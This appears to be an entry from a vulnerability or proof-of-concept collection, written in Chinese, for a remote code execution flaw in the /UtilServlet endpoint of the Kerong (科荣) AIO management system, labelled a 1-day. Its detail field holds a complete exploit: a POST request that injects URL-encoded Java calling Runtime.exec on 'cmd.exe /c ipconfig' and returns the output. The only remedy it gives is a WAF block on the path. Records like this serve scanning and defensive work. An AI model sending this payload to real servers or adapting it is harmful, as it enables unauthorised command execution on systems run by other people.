vendor = "科荣"
name = "科荣 AIO 管理系统 UtilServlet 远程代码执行漏洞"
type = "RCE"
version = "未知"
path = "/UtilServlet"
detail = "POST /UtilServlet HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/x-www-form-urlencoded operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"cmd.exe+/c+ipconfig\").getI nputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field"
fix = "WAF封禁路路径，等待发布补丁"
date = "0808"
label = "1day"
